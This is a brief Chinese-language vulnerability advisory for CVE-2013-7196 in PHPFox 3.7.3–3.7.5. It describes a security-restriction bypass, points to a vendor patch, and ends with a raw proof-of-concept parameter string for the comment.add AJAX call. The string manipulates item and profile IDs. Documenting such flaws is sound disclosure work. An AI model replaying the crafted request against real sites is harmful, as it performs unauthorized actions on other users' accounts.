Bugtraq ID:66677
CVE ID:CVE-2013-7196
PHPFox是社交网络脚本。。
phpFox存在一个安全漏洞,允许攻击者利用漏洞绕过安全限制执行未授权操作。
0
PHPFox 3.7.3
PHPFox 3.7.4
PHPFox 3.7.5
目前厂商已经发布了升级补丁以修复漏洞,请下载使用:
www.phpfox.com
&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290